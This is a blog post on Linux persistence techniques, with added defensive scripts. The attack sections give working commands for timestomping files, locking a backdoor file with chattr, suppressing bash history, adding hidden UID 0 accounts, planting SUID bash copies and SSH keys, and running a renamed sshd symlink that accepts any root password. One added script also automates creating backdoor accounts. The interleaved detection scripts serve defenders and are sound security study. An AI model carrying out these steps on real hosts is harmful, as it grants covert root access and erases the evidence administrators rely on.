Linux System Persistence Techniques and Implementation Methods

File Concealment Strategies

Defenders hunting for a web shell or a dropped binary usually look for recently created or modified files and sweep sensitive directories (web roots, /tmp, cron directories) for unauthorized uploads. Two techniques are used to frustrate those checks: timestamp manipulation and file attribute locking.

Timestamp manipulation sets a planted file's access and modification times to match a legitimate neighbour so it does not stand out in a sort by recency. File attribute locking (the immutable attribute) prevents the file from being modified or deleted, even by root, until the attribute is cleared. It does not hide the file from directory listings; what is hidden is the attribute itself, which ls -l never shows.

Timestamp Manipulation

touch updates a file's access time (atime) and modification time (mtime), creating the file if it does not exist. With -r it copies both times from a reference file instead of using the current time:

touch -r [legitimate_file] [malicious_file]

Afterwards the planted file's atime and mtime are identical to those of the reference file. The inode change time (ctime) cannot be set from userspace and is bumped to the current time by this very command, so stat still shows a ctime far newer than the mtime. That gap is the standard indicator of timestomping, and it is what a defender should search for rather than trusting mtime.
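The following script is an added example (not part of the original post) that performs the touch -r clone and then applies the ctime-versus-mtime check a defender would run against a directory. The temp-directory file names are made up for the demonstration.

```shell
#!/bin/bash
# Added example, not from the original post: clone atime/mtime with
# touch -r, then show that ctime still betrays the write. File names
# under the temp dir are made up for the demo.
set -u

# Copy access and modification times from REF onto TARGET (the touch -r
# technique). ctime is maintained by the kernel and cannot be copied.
clone_times() {
    local ref="$1" target="$2"
    touch -r "$ref" "$target"
}

# List files under DIR whose ctime is more than SLACK seconds newer
# than their mtime: the inode was changed long after the content claims
# to have been written, the usual fingerprint of touch -r.
# Output: one path per line.
find_timestomped() {
    local dir="$1" slack="${2:-60}"
    find "$dir" -type f -exec stat -c '%Z %Y %n' {} + 2>/dev/null |
        awk -v slack="$slack" \
            '($1 - $2) > slack { print substr($0, length($1) + length($2) + 3) }'
}

demo() {
    local d
    d=$(mktemp -d)
    # The reference is backdated with touch -d here because the demo has
    # no genuinely old file; on a real host you would pick an untouched
    # package-installed file (and it would not be flagged below).
    touch -d '2020-01-01 00:00:00' "$d/legit.conf"
    echo 'payload' > "$d/dropped.php"          # fresh file, all times = now
    clone_times "$d/legit.conf" "$d/dropped.php"
    echo "mtime now matches:"; stat -c '%n %y' "$d/legit.conf" "$d/dropped.php"
    echo "ctime does not:";    stat -c '%n %z' "$d/dropped.php"
    echo "flagged by ctime/mtime gap:"; find_timestomped "$d"
    rm -rf "$d"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Run it with `bash script.sh demo`. The 60-second slack absorbs normal installs, where a package manager writes a file and sets its mtime within the same second or two; a gap of years is not something a legitimate workflow produces.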

File Attribute Locking

chattr sets filesystem attributes. The immutable attribute (+i) stops a file from being modified, deleted, renamed or linked to, even by root, until the attribute is removed; setting or clearing it needs CAP_LINUX_IMMUTABLE (in practice, root) and a filesystem that supports attributes (ext2/3/4, XFS and Btrfs among others). The attribute never appears in ls -l output, only in lsattr, which is what makes it useful for concealment and what a defender should run recursively when a file refuses to go away.

# Apply immutable attribute
chattr +i backdoor.php

# Deletion now fails with "Operation not permitted", even as root
rm -rf backdoor.php

To remove the lock:

# Check attributes
lsattr backdoor.php

# Remove immutable attribute
chattr -i backdoor.php

# Delete file
rm -rf backdoor.php

Command History Obfuscation

Interactive shells keep a record of executed commands; bash holds the list in memory and writes it to $HISTFILE (by default ~/.bash_history) when the session ends. Keeping the commands that installed a backdoor out of that file matters, because a persistence mechanism only survives as long as nobody notices how it got there.

# Stop recording for the rest of the session. The leading space keeps this
# line itself out of history only when HISTCONTROL contains ignorespace or ignoreboth
 set +o history

From here on nothing is added to the history list. If HISTCONTROL is not set to ignorespace or ignoreboth, the `set +o history` line is recorded like any other and has to be deleted by number:

# Delete a specific entry by the number shown in `history` output
history -d [line_number]

history -d changes only the in-memory list, and is itself recorded unless prefixed with a space. The list is written to $HISTFILE when the shell exits, so anything already flushed to disk by an earlier session has to be removed from the file separately.

To restore normal history functionality:

# Re-enable recording (again with a leading space so the line is not kept)
 set -o history

Backdoor User Creation

Local Linux authentication is driven by /etc/passwd and /etc/shadow. On modern systems the password field of /etc/passwd holds only an x; the password hashes (crypt(3) strings such as $6$... for SHA-512) live in /etc/shadow, which is readable only by root.

Field layout of the two files:

# /etc/passwd fields
username:password:UID:GID:description:home_directory:shell

# /etc/shadow fields
username:encrypted_password:last_change:min_age:max_age:warning:inactive:expire:reserved

Privileged Backdoor Accounts

Appending one line to each file is enough to create an account that can log in. Because no useradd call is involved, nothing is written to the auth log by useradd; the change is visible only to something that watches the files themselves (file integrity monitoring, or an audit rule on /etc/passwd and /etc/shadow).

Root-Level Access

If sshd permits password logins for UID 0 (PermitRootLogin yes, which sshd applies to any account with UID 0, not only the name root):

# Create a second UID 0 account; on shadow-utils systems passwd creates
# the missing /etc/shadow entry when it sets the password
echo "backdoor_user:x:0:0::/:/bin/sh" >> /etc/passwd
passwd backdoor_user
ssh backdoor_user@[target_ip]

Standard User Access

For systems that block root SSH logins, a normal account still gives a foothold:

# Create a regular user; UID/GID 1000 is usually already taken by the first
# real user, and a duplicate UID is an obvious audit finding, so prefer a free one
echo "backdoor_user:x:1000:1000::/:/bin/sh" >> /etc/passwd
passwd backdoor_user
ssh backdoor_user@[target_ip]

From a non-interactive shell (a web shell, for instance) there is no terminal for passwd's prompt, so the credentials are piped instead: feed a `user:password` pair to chpasswd on standard input, or write a precomputed crypt(3) hash straight into /etc/shadow as a single command.
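The script below is an added example (not part of the original post). It builds the passwd and shadow lines non-interactively from a precomputed hash, and pairs that with the two audit queries a defender would run over the same files: extra UID 0 accounts and duplicate UIDs. It operates on whatever file paths it is given, so it can be exercised on copies without root; the account name, hash and sample users are made up.

```shell
#!/bin/bash
# Added example, not from the original post. Operates on copies of
# passwd/shadow so it runs unprivileged; as root, point it at the real
# files to apply. Account name and password are invented.
set -u

# Build a passwd(5) line: NAME UID GID [SHELL], home directory /.
passwd_line() {
    local name="$1" uid="$2" gid="$3" shell="${4:-/bin/sh}"
    printf '%s:x:%s:%s::/:%s\n' "$name" "$uid" "$gid" "$shell"
}

# Build a shadow(5) line with the hash already computed, so no
# interactive passwd prompt is needed (the single-command case).
# last_change is today in days since the epoch; the rest are defaults.
shadow_line() {
    local name="$1" hash="$2"
    printf '%s:%s:%s:0:99999:7:::\n' "$name" "$hash" "$(( $(date +%s) / 86400 ))"
}

# Append an account without useradd or passwd. HASH is a crypt(3)
# string, e.g. the output of: openssl passwd -6 'Passw0rd'
# (assumes openssl is installed; any crypt(3)-compatible hash works).
add_account() {
    local passwd_file="$1" shadow_file="$2" name="$3" uid="$4" gid="$5" hash="$6"
    passwd_line "$name" "$uid" "$gid" >> "$passwd_file"
    shadow_line "$name" "$hash" >> "$shadow_file"
}

# Defender side: every account with UID 0 other than root, one name
# per line. Empty output is the healthy state.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Defender side: UIDs shared by more than one account, as "uid: names".
# The UID 1000 variant from the post collides with the first real user.
duplicate_uids() {
    awk -F: '{ n[$3]++; who[$3] = who[$3] " " $1 }
             END { for (u in n) if (n[u] > 1) print u ":" who[u] }' "$1"
}

# Usage (as root, on the live files):
#   add_account /etc/passwd /etc/shadow backdoor_user 0 0 "$(openssl passwd -6 'Passw0rd')"
# Audit:
#   uid0_accounts /etc/passwd; duplicate_uids /etc/passwd
```

Both audit queries are cheap enough to run from cron and diff against the previous run; a new line in either output is a high-confidence alert, since legitimate provisioning almost never creates a second UID 0 or a shared UID.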

SUID Privilege Escalation

SUID (Set User ID) makes an executable run with the effective UID of its owner rather than of the caller. A root-owned file with the SUID bit set therefore runs as root for whoever executes it.

Creating a SUID backdoor:

# As root
cp /bin/bash /tmp/.hidden_backdoor
chmod 4755 /tmp/.hidden_backdoor

# Later, as any user. bash resets its effective UID to the real UID on
# startup unless started with -p, so the flag is mandatory
/tmp/.hidden_backdoor -p

Two things break this in practice: /tmp is frequently mounted nosuid, in which case the kernel ignores the bit entirely, and a copy of bash outside the package manager's file list is exactly what SUID audits look for.

Hunting for SUID files (the two forms are equivalent; compare the output against a known-good baseline rather than eyeballing it):

find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
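The script below is an added example (not part of the original post) that wraps the find commands above into a baseline-and-diff workflow: record the SUID inventory once after provisioning, then report anything that has appeared since. The directory and file names are placeholders.

```shell
#!/bin/bash
# Added example, not from the original post. Baseline-and-diff for
# setuid files; DIR and BASELINE paths are placeholders.
set -u

# Every setuid regular file under DIR, sorted so the list can be diffed.
# -xdev keeps the scan on one filesystem (repeat per mount point).
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Only the root-owned ones, which are the files that grant root.
find_suid_root() {
    find "$1" -xdev -type f -user root -perm -4000 2>/dev/null | sort
}

# Record the inventory once, after provisioning and before the host
# sees traffic. BASELINE is a plain sorted list of paths.
save_baseline() {
    find_suid "$1" > "$2"
}

# Setuid files present now but absent from BASELINE, one per line.
# comm needs sorted input on both sides, which find_suid guarantees.
new_suid() {
    local dir="$1" baseline="$2"
    find_suid "$dir" | comm -13 "$baseline" -
}

# Usage on a live host (as root so every directory is readable):
#   save_baseline / /var/lib/suid.baseline      # once
#   new_suid / /var/lib/suid.baseline           # from cron; any output is an alert
```

Keep the baseline file off the host (or at least immutable) so that an attacker who plants a SUID binary cannot simply append its path to the baseline as well.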

SSH Key-Based Persistence

An SSH key pair gives durable, password-independent access: the attacker's public key is appended to the target user's ~/.ssh/authorized_keys while the private half stays with the attacker. sshd with StrictModes (the default) silently ignores the file if ~/.ssh or authorized_keys is group- or world-writable, so the permissions are part of the job:

# Attacker side: generate the pair (defaults to ~/.ssh/id_rsa and id_rsa.pub)
ssh-keygen -t rsa
# Target side, as the user to be backdoored: append the PUBLIC key
mkdir -p ~/.ssh && chmod 700 ~/.ssh
cat id_rsa.pub >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
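The following script is an added example (not part of the original post) for the defender's side of this technique: it walks every home directory listed in a passwd file and prints one line per authorized key, so a planted key shows up as a new line in a diff. The sample users and keys used to exercise it are constructed.

```shell
#!/bin/bash
# Added example, not from the original post: inventory authorized_keys
# entries for every account in a passwd file. PASSWD defaults to
# /etc/passwd; pass a copy to audit an offline image.
set -u

# Print "user key-type comment mode" for each key in each user's
# ~/.ssh/authorized_keys (and the legacy authorized_keys2). The file
# mode is included because a group/other-writable file is ignored by
# sshd under StrictModes yes, which matters when judging impact.
list_authorized_keys() {
    local passwd="${1:-/etc/passwd}" user home f mode line
    while IFS=: read -r user _ _ _ _ home _; do
        for f in "$home/.ssh/authorized_keys" "$home/.ssh/authorized_keys2"; do
            [ -f "$f" ] || continue
            mode=$(stat -c %a "$f")
            # skip blank lines and comments; entry = [options] type base64 [comment]
            grep -Ev '^[[:space:]]*(#|$)' "$f" | while read -r line; do
                # shellcheck disable=SC2086  (word splitting is intended)
                set -- $line
                # an options prefix such as from="10.0.0.5" precedes the key type
                while [ $# -gt 0 ] && ! echo "$1" | grep -Eq '^(ssh-|ecdsa-|sk-)'; do
                    shift
                done
                [ $# -ge 2 ] || continue
                printf '%s %s %s %s\n' "$user" "$1" "${3:-<no-comment>}" "$mode"
            done
        done
    done < "$passwd"
}

# Usage: list_authorized_keys | sort > /var/lib/authkeys.today
#        diff /var/lib/authkeys.yesterday /var/lib/authkeys.today
```

Run it as root so every home directory is readable. The comment field is whatever the key's creator left in it, which is exactly why it is worth printing: an attacker's key usually carries a comment from the machine it was generated on.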

Symbolic Link Backdoors

A symbolic link to sshd can provide a covert SSH entry point. sshd passes the basename of its own argv[0] to PAM as the service name, so if the link is named after a PAM service whose auth stack starts with pam_rootok.so (su, chsh, chfn and runuser on most distributions), PAM authentication succeeds for any password: pam_rootok only asks whether the calling process is root, and sshd is. UsePAM must be yes, and password authentication plus root login must be permitted by the configuration the process loads (any sshd_config option can be overridden on the command line with -o):

# Verify PAM is in use: the value must be "yes"; sshd -T shows the effective setting
grep -i UsePAM /etc/ssh/sshd_config
sshd -T | grep -i usepam

# Create backdoor (as root); the link name must be a PAM service that uses pam_rootok
ln -sf /usr/sbin/sshd /usr/local/su
/usr/local/su -oPort=[backdoor_port]

# Connect as root with any password
ssh root@[ip_address] -p [backdoor_port]

The link name is what ps shows as the process name, and a process called su listening on a TCP port stands out. Any other PAM service file that contains pam_rootok works just as well, so pick the least conspicuous one; the name still has to be one of those, it cannot be arbitrary:

ln -sf /usr/sbin/sshd /tmp/[innocuous_name]
/tmp/[innocuous_name] -oPort=[backdoor_port]

Listing the PAM services that carry pam_rootok, which is the set of valid link names:

grep -l pam_rootok /etc/pam.d/*

Examples using service names that ship with pam_rootok on common distributions (the ports are arbitrary):

ln -sf /usr/sbin/sshd /tmp/chsh
/tmp/chsh -oPort=23333

ln -sf /usr/sbin/sshd /tmp/chfn
/tmp/chfn -oPort=23334

ln -sf /usr/sbin/sshd /tmp/runuser
/tmp/runuser -oPort=23335
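The script below is an added example (not part of the original post) covering both sides of this technique: enumerating the PAM services whose auth stack contains pam_rootok (the only names the link can take), and scanning /proc for processes whose executable resolves to sshd but whose argv[0] basename is something else, which is what the renamed symlink looks like to the kernel. The PAM directory argument defaults to /etc/pam.d; the test builds a fake one.

```shell
#!/bin/bash
# Added example, not from the original post: the two checks that
# matter for the sshd-symlink trick. PAMDIR defaults to /etc/pam.d.
set -u

# Service names whose auth stack contains pam_rootok.so. sshd uses the
# basename of its argv[0] as the PAM service, and pam_rootok succeeds
# because sshd runs as root, so any password is accepted for these.
rootok_services() {
    local pamdir="${1:-/etc/pam.d}" f
    for f in "$pamdir"/*; do
        [ -f "$f" ] || continue
        grep -Eq '^[[:space:]]*auth[[:space:]]+.*pam_rootok\.so' "$f" && basename "$f"
    done
    return 0
}

# Processes whose /proc/PID/exe resolves to EXE but whose argv[0]
# basename differs from the binary's own name. /proc/PID/exe follows
# symlinks, so a link named chsh pointing at sshd is reported here.
# Output per hit: "PID argv0-basename full-cmdline".
renamed_instances() {
    local exe="$1" pid link argv0 name
    exe=$(readlink -f "$exe")
    name=$(basename "$exe")
    for pid in /proc/[0-9]*; do
        link=$(readlink "$pid/exe" 2>/dev/null) || continue   # unreadable or kernel thread
        [ "$link" = "$exe" ] || continue
        argv0=$(tr '\0' '\n' < "$pid/cmdline" 2>/dev/null | head -n1)
        [ "$(basename "$argv0")" != "$name" ] || continue
        printf '%s %s %s\n' "${pid#/proc/}" "$(basename "$argv0")" \
            "$(tr '\0' ' ' < "$pid/cmdline")"
    done
    return 0
}

# Usage (as root so every /proc/PID/exe is readable):
#   rootok_services                       # names an attacker can use
#   renamed_instances /usr/sbin/sshd      # any output is a backdoor candidate
```

The scan in renamed_instances generalizes beyond sshd: pointing it at any setuid-sensitive binary reports every process that was started under an assumed name. Pair it with `ss -tlnp` to see which of the hits is also listening on an unexpected port.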

Tags: Linux Persistence Security privilege-escalation red-team

Posted on Sun, 10 May 2026 04:18:53 +0000 by andrei.mita